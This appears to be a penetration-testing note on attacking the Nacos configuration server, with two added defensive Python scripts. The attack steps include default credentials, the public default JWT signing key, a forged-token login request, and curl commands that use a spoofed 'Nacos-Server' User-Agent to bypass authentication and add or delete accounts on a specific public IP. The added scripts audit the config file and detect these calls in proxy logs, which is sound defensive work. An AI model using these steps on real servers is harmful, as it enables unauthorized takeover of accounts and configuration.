Nacos tool usage
![](https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%B8%97%E9%80%8F/nacos/image-20240719143048210.png)
Weak passwords
Worth trying a few combinations, for example:
nacos/nacos
Identity forgery
The key Nacos generates by default
Nacos default key (the token.secret.key value sits in application.properties under conf):
SecretKey012345678901234567890123456789012345678901234567890123456789
JWT data:

```json
{ "sub": "nacos", "exp": 1682308800 }
```
Then replace the secretKey:
![image-20240720094451430](https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%B8%97%E9%80%8F/nacos/image-20240720094451430.png)
Then enter any password.
In the request that submits the username and password, replace the JWT. The server will send back a response; intercept that response and replace it as well.
```http
POST /v1/auth/users/login HTTP/1.1
Host: 101.42.21.9
Content-Length: 29
Pragma: no-cache
Cache-Control: no-cache
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 uacq
Content-Type: application/x-www-form-urlencoded
Origin: http://101.42.21.9
Referer: http://101.42.21.9/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Google Chrome";v="113", "Chromium";v="113", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcxMDkzNjAyMH0.b2Qruw41JqKA5u5hNcwxjlLxMbP98fznXy9y2oF7Xxo

username=nacos&password=nacos
```
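From the defender's side, the default key described above, together with the other auth settings that live in the same conf/application.properties, can be audited mechanically. The script below is an added example, not code from the original post or from the Nacos project: it parses a .properties file and flags the risky values. The property names are Nacos' own documented auth settings; both sample files are constructed for this demonstration and the hardened values are placeholders, not real secrets.

```python
"""Audit nacos/conf/application.properties for the auth weaknesses discussed above.

Added example (not from the original post or from Nacos). Property names are
the documented Nacos auth settings; the two sample files are constructed here.
"""

# The well-known signing key shipped in a stock Nacos application.properties.
NACOS_DEFAULT_SECRET_KEY = (
    "SecretKey012345678901234567890123456789012345678901234567890123456789"
)

# Constructed sample: a stock install that was never hardened.
SAMPLE_UNHARDENED = """\
# constructed sample, not a real deployment
server.port=8848
nacos.core.auth.enabled=false
nacos.core.auth.enable.userAgentAuthWhite=true
nacos.core.auth.default.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789
nacos.core.auth.server.identity.key=
nacos.core.auth.server.identity.value=
"""

# Constructed sample: the same file after hardening (values are placeholders).
SAMPLE_HARDENED = """\
# constructed sample, values are placeholders
server.port=8848
nacos.core.auth.enabled=true
nacos.core.auth.enable.userAgentAuthWhite=false
nacos.core.auth.default.token.secret.key=PLACEHOLDER_REPLACE_WITH_RANDOM_BASE64_KEY_OF_32_PLUS_BYTES
nacos.core.auth.server.identity.key=serverIdentity
nacos.core.auth.server.identity.value=PLACEHOLDER_REPLACE_WITH_RANDOM_VALUE
"""


def parse_properties(text):
    """Minimal Java .properties parser: key=value lines, '#'/'!' comments, trimmed."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        key, sep, value = line.partition("=")
        if sep:
            props[key.strip()] = value.strip()
    return props


def audit_nacos_auth(props):
    """Return a list of finding codes; an empty list means nothing was flagged."""
    findings = []

    # With auth disabled every /v1/auth and config/naming endpoint is open.
    if props.get("nacos.core.auth.enabled", "false").lower() != "true":
        findings.append("auth-disabled")

    # The stock key is public, so any JWT signed with it is accepted as valid.
    key = props.get("nacos.core.auth.default.token.secret.key", "")
    if key == NACOS_DEFAULT_SECRET_KEY:
        findings.append("default-secret-key")
    elif not key:
        findings.append("empty-secret-key")

    # userAgentAuthWhite lets a bare "User-Agent: Nacos-Server" header skip auth.
    # Older releases default it to true, so treat an unset value as enabled.
    if props.get("nacos.core.auth.enable.userAgentAuthWhite", "true").lower() == "true":
        findings.append("user-agent-whitelist-enabled")
    elif not (props.get("nacos.core.auth.server.identity.key")
              and props.get("nacos.core.auth.server.identity.value")):
        # With the whitelist off, cluster nodes need a shared identity header instead.
        findings.append("server-identity-unset")

    return findings


if __name__ == "__main__":
    for name, text in (("unhardened", SAMPLE_UNHARDENED), ("hardened", SAMPLE_HARDENED)):
        print(name, audit_nacos_auth(parse_properties(text)))
```

Run it against the real file with `audit_nacos_auth(parse_properties(open("conf/application.properties").read()))`; any non-empty result is a finding to fix before the instance is exposed.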
Unauthenticated access
```bash
# View the user list
/v1/auth/users?pageNo=1&pageSize=10

# Add a user
curl -X POST 'http://101.42.21.9/v1/auth/users?username=shangxin&password=shangxin' -H 'User-Agent: Nacos-Server'
# i.e. POST /v1/auth/users with body username=shangxin&password=shangxin and header User-Agent: Nacos-Server

# Check whether the user was added
/v1/auth/search?username=shangxin
curl 'http://101.42.21.9/v1/auth/search?username=shangxin'

# Delete the user
curl -X DELETE "http://101.42.21.9/v1/auth/users?username=shangxin"
```
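The calls listed above leave a clear trace in the access log of whatever reverse proxy fronts Nacos. The Python below is an added example, not from the original post or the Nacos project: it parses nginx combined-format log lines (constructed here) and flags user-management calls to /v1/auth/users as well as any request presenting the Nacos-Server User-Agent from an address outside an assumed list of cluster members.

```python
"""Flag suspicious Nacos auth-API traffic in a proxy access log.

Added example (not from the original post or from Nacos). Log lines and the
cluster member list are constructed for this demonstration.
"""
import re
from urllib.parse import urlsplit

# Assumed cluster members: only these should legitimately send "User-Agent: Nacos-Server".
CLUSTER_NODES = {"10.0.0.11", "10.0.0.12", "10.0.0.13"}

# nginx "combined" format: ip - user [time] "METHOD path PROTO" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log: one legitimate cluster call, then the pattern from the post.
SAMPLE_LOG = """\
10.0.0.12 - - [20/Jul/2024:09:44:51 +0800] "POST /nacos/v1/ns/instance HTTP/1.1" 200 2 "-" "Nacos-Server"
203.0.113.7 - - [20/Jul/2024:09:45:02 +0800] "GET /nacos/v1/auth/users?pageNo=1&pageSize=10 HTTP/1.1" 200 312 "-" "Nacos-Server"
203.0.113.7 - - [20/Jul/2024:09:45:09 +0800] "POST /nacos/v1/auth/users?username=newuser&password=newuser HTTP/1.1" 200 18 "-" "Nacos-Server"
198.51.100.4 - - [20/Jul/2024:09:50:00 +0800] "GET /nacos/ HTTP/1.1" 200 4521 "-" "Mozilla/5.0"
203.0.113.7 - - [20/Jul/2024:09:51:30 +0800] "DELETE /nacos/v1/auth/users?username=newuser HTTP/1.1" 200 18 "-" "curl/8.4.0"
"""

UA_SPOOF = "nacos-server user-agent from non-cluster ip"
USER_MGMT = "user management call"
USER_ENUM = "user list enumeration"


def parse_access_log(text):
    """Yield one dict per parseable line; lines that do not match are skipped."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def detect_nacos_abuse(text, cluster_nodes=CLUSTER_NODES):
    """Return alerts: one dict per suspicious request, each with a list of reasons."""
    alerts = []
    for req in parse_access_log(text):
        reasons = []
        path = urlsplit(req["path"]).path  # drop the query string before matching

        # A server-to-server User-Agent from outside the cluster is the auth bypass header.
        if req["ua"] == "Nacos-Server" and req["ip"] not in cluster_nodes:
            reasons.append(UA_SPOOF)

        # /v1/auth/users is the account-management endpoint (works with or without
        # the /nacos context path).
        if path.endswith("/v1/auth/users"):
            if req["method"] in {"POST", "PUT", "DELETE"}:
                reasons.append(USER_MGMT)
            elif req["method"] == "GET":
                reasons.append(USER_ENUM)

        if reasons:
            alerts.append({"ip": req["ip"], "method": req["method"],
                           "path": path, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect_nacos_abuse(SAMPLE_LOG):
        print(alert)
```

Feed it the proxy log with `detect_nacos_abuse(open("access.log").read())`; a cluster node in the member list never trips the first rule, so every alert with the User-Agent reason is worth a look.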